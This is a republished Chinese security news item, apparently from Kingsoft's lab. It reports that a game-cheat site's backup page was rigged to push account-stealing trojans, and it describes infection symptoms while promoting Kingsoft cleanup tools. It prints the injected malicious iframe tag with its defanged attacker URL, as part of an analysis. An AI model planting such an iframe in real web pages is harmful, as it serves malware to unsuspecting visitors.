站長資訊網 金山毒霸安全實驗室監(jiān)測6月17日消息,金山網盾云端數(shù)據(jù)突然監(jiān)測到西西游戲網的當日外掛下載均報危險。西西游戲網是深受外掛玩家歡迎的游戲外掛下載網站,外掛玩家出于對西西游戲網的信任,很可能認為殺毒軟件誤報西西游戲網下載的外掛程序,若不幸中毒,可使用金山急救箱快速恢復系統(tǒng),安裝了金山網盾的用戶將不會受害。
免費下載金山網盾:http://www.duba.net/wangdun/
金山毒霸安全專家對西西游戲網的異常情況進行了詳細檢查,結果發(fā)現(xiàn)是西西游戲網近日提供了一個西西游戲登錄器,這個登錄器的作用是在西西游戲網不能登錄時,使用登錄器訪問備用網站。但很不幸,這個備用網站被入侵,或備用網站出于某些原因被人為植入木馬。當外掛玩家訪問備用網站時,會下載大量盜號木馬。安裝了金山網盾的玩家在打開西西游戲登錄器訪問到掛馬頁面時,金山網盾會立即彈出報警。
分析發(fā)現(xiàn)掛馬的方式是在正常頁面中插入<iframe src= hxxp://www.9966.org:8801/user/Zr02/index.html width=100 height=0></iframe>
其中hxxp://www.9966.org:8801/user/Zr02/index.html頁利用系統(tǒng)多個漏洞掛馬,訪問時會下載大量盜號木馬,下圖中的js文件實際全部為PE文件(可執(zhí)行程序)。
若外掛玩家不慎中招,會發(fā)現(xiàn)系統(tǒng)速度變慢。在開始、運行,輸入%Temp%,會發(fā)現(xiàn)temp文件夾下出現(xiàn)大量隱藏屬性的DLL文件
訪問西西游戲網不慎中毒之后,會在temp文件夾發(fā)現(xiàn)大量DLL病毒
中毒后的電腦會發(fā)現(xiàn)桌面快捷方式小箭頭不見了,這是病毒修改了桌面快捷方式的屬性。
查看被修改后的桌面快捷方式屬性,會發(fā)現(xiàn)對應的打開方式已被修改為wscript.exe
使用金山急救箱快速清除病毒,恢復被破壞的系統(tǒng)
金山毒霸反病毒專家指出,西西游戲網被掛馬的頁面已被管理員發(fā)現(xiàn)清除,目前尚無法得知這是網站被黑客入侵還是其它人為原因。金山安全專家提醒游戲玩家,特別是偏好使用外掛的游戲玩家務必小心,推薦安裝金山網盾攔截可能的威脅。
已經不幸中招的外掛玩家,可以使用金山急救箱來清除病毒,修復被破壞的系統(tǒng)。
特別提醒:本網內容轉載自其他媒體,目的在于傳遞更多信息,并不代表本網贊同其觀點。其原創(chuàng)性以及文中陳述文字和內容未經本站證實,對本文以及其中全部或者部分內容、文字的真實性、完整性、及時性本站不作任何保證或承諾,并請自行核實相關內容。本站不承擔此類作品侵權行為的直接責任及連帶責任。如若本網有任何內容侵犯您的權益,請及時聯(lián)系我們,本站將會在24小時內處理完畢。
